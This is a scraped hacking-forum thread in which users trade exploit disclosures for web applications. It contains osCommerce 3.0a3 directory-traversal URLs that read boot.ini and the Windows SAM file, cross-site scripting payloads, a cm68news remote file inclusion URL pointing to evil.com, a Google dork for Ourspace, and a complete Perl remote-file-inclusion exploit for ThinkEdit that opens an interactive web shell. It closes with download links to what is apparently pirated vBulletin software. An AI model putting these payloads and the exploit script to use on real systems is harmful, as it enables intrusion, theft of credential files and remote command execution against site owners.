Don

u r a n00b btw, why the 1st part isnt crypted too ?

++++++++++++++++++++++++++++++++++++ | Discovered by Breaker_unit & Don | | Ourspace 2.0.9| script info: [url]http://www.codedworld.com/download/our-space/26931.html[/url] Exploit: /cgi-bin/ourspace/newswire/uploadmedia.cgi dork: inurl:"/cgi-bin/ourspace/ Greetz to: Balcan Crew Members and my friends: str0ke & kw3rLn +++++++++++++++++++++++++++++++++++++++ # milw0rm.com [2007-08-30]

Thx for posting it

Very nice! Thx for these, but, just curious, who founded the exploit ?

Version(s): 3.0a3 Description: Lostmon reported a vulnerability in osCommerce. A remote user can view files on the target system. A remote user can also conduct cross-site scripting attacks. The 'admin/templates_boxes_layout.php' does not properly validate user-supplied input in the 'filter' parameter. A remote user can supply a specially crafted request to view files on target system. Some demonstration exploit URLs are provided: [url]http://[target]/admin/templates_boxes_layout.php?se[/url] t=boxes&filter=../../our_evil_php_file&lID=27 [url]http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../../../file.extension%00[/url] A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the osCommerce software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. Some demonstration exploit URLs are provided: [url]http://[target]/oscommerce/admin/modules.php?set=shipping[/url] %22%3E%3Cscr ipt%3Ealert('xss')%3C/script%3E [url]http://[target]/definitiva/admin/customers.php?selected_box=customers[/url] %22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT %3E [url]http://[target]/oscommerce/admin/languages_definitions.php?lID=1[/url] %22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E [url]http://[target]/oscommerce[/url] /admin/products.php?pID=1%22%3E%3CSCRIPT %3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product The original advisory is available at: [url]http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html[/url] Impact: A remote user can view files on the target system. A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the osCommerce software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. Solution: No solution was available at the time of this entry. Vendor URL: [url]http://www.oscommerce.com/[/url] (Links to External Site) Cause: Input validation error Underlying OS: Linux (Any), UNIX (Any), Windows (Any) Reported By: Lostmon <lostmon@gmail.com> Message History: None. Source Message Contents Date: Thu, 7 Dec 2006 10:31:42 +0100 From: Lostmon <lostmon@gmail.com> Subject: Oscommerce 3.0a3 traversal arbitrary file access ############################################ Oscommerce traversal arbitrary file access Vendor:[url]http://www.oscommerce.com/about/news,125[/url] Advisore:[url]http://lostmon.blogspot.com/2006/12[/url] /oscommerce-traversal-arbitrary-file.html Vendor notify:NO Exploit available: YES ########################################### osCommerce contains a flaw that allows a remote traversal arbitrary file access.This flaw exists because the application does not validate filter variable upon submission to admin/templates_boxes_layout.php script.This could allow a remote authenticated administrator to create a specially crafted URL that would execute '../' directory traversal characters to view files on the target system with the privileges of the target web service. #################### versions #################### Oscommerce 3.0a3 ################### SOLUTION ################### No solution was available at this time. ################ timeline ################ Discovered:11-11-2006 vendor notify:----- vendor response:---- disclosure:07-12-2006 ################# Examples ################# ###################### traversal file access ###################### wen we try to open [url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url] set=boxes&filter=[SOME WORD]&lID=27 the aplication returns a full path disclosure and returns this error: Warning: require(includes/templates/[SOME WORD].php) [function.require]: failed to open stream: No such file or directory in C:AppServwww oscommerceadmintemplatespagestemplates_boxes_layout.php on line 13 Fatal error: require() [function.require]: Failed opening required 'includes/templates/[SOME WORD].php' (include_path='.;C:php5pear') in C:AppServwwwoscommerceadmintemplatespagestemplates_ boxes_layout.php on line 13 the aplication add the .php extension to our [SOME WORD] ummm and it searh for the file in a folder inside webserver we can include any php file located on the web server in the aplication and it is executed(local file inclusion) [url]http://[victim]/admin/templates_boxes_layout.php?[/url] set=boxes&filter=../../our_evil_php_file&lID=27 if we try to read a file outside webserver folder with a non php extension can try for test this... &filter=../../../../file.extension%00 for look for example boot.ini in a windows system [url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url] set=boxes&filter=../../../../BOOT.INI%00&lID=27 [url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url] set=content&filter=../../../../windows/repair/sam%00&lID=27 ##################### Cross site scripting ##################### [url]http://localhost/oscommerce/admin/modules.php?set=shipping[/url] %22%3E%3Cscript%3Ealert('xss')%3C/script%3E [url]http://localhost/definitiva/admin/customers.php?selected_box=customers[/url] %22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E [url]http://localhost/oscommerce/admin/languages_definitions.php?lID=1[/url] %22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E [url]http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT[/url] %3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product ######################## €nd ##################### Thnx to Estrella to be my ligth. -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: [url]http://lostmon.blogspot.com/[/url] -- La curiosidad es lo que hace mover la mente..

M8, i`m realy sorry, but i dont understand what are you writing. Can you please tell me that on English

Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: [url]http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?&[/url]

################################################################################################# # r0ut3r Presents... # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # ThinkEdit Remote File Inclusion Exploit # ################################################################################################# # Software: ThinkEdit 1.9.2 # # # # Vendor: [url]http://www.thinkedit.org/[/url] # # # # Released: 2006/12/08 # # # # Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for ThinkEdit administrator # # testing purposes only! # # # # Solution: # # Add the below code to the top of render.php # # if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) # # die(); # # # # Exploit: # # perl think.pl [url]http://localhost[/url] /think/ [url]http://localhost/cmd.txt[/url] cmd # # # # design/thinkedit/render.php?template_file= # ################################################################################################# ############################################################################ # Remote File Inclusion Exploiter # # # # This script attempts to exploit a remote file include vulnerability # # by inserting a web shell into an include statement. A shell is then # # spawned. # # # # Created By r0ut3r (writ3r [at] gmail.com) # ############################################################################ use IO::Socket; $port = "80"; # connection port $target = @ARGV[0]; # localhost $folder = @ARGV[1]; # /think/ $shellloc = @ARGV[2]; # [url]http://localhost/cmd.txt[/url] $cmdv = @ARGV[3]; # cmd $vulnerable = false; $s = true; sub Header() { print q {Remote File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com) ------------------------------------------------------------------- }; } sub Usage() { print q { Usage: think.pl [target] [directory] [shell_loc] [cmd_variable] perl think.pl [url]http://localhost[/url] /think/ [url]http://localhost/cmd.txt[/url] cmd }; exit(); } Header(); if (!$target || !$folder || !$shellloc || !$cmdv) { Usage(); } if ($s eq false) { print "[-] Shell not foundn"; exit(); } # Check if the script is vulnerable and register_globals are on (if needed) $vulnc = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...rn"; print $vulnc "GET ".$folder."render.php?template_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1n"; print $vulnc "Host: $targetn"; print $vulnc "User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])n"; print $vulnc "Accept: text/htmln"; print $vulnc "Connection: keep-alivenn"; while (<$vulnc>) { if (/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/) { $vulnerable = true; } } if ($vulnerable eq false) { print "[-] Target not vulnerable, or register_globals could be offn"; exit(); } print "[+] Starting shelln"; print "[cmd]$ "; $cmd = <STDIN>; $cmd =~ s/ /%20/g; while ($cmd !~ "exit") { $xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...rn"; print $xpack "GET ".$folder."render.php?template_file=".$shellloc."&".$cmdv."=".substr($cmd, 0, -1)." HTTP/1.1n"; print $xpack "Host: $targetn"; print $xpack "User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])n"; print $xpack "Accept: text/htmln"; print $xpack "Connection: keep-alivenn"; print "[cmd]$ "; $cmd = <STDIN>; } print "[!] Connection to host lost...n";

Deleted by uploader

file deleted

File deleted

File deleted

backup links http://rapidshare.de/files/28518171/vBulletin_v3.6.0_Gold.rar or http://rapidshare.de/files/28518034/vBulletin_v3.6.0_Gold.rar

lol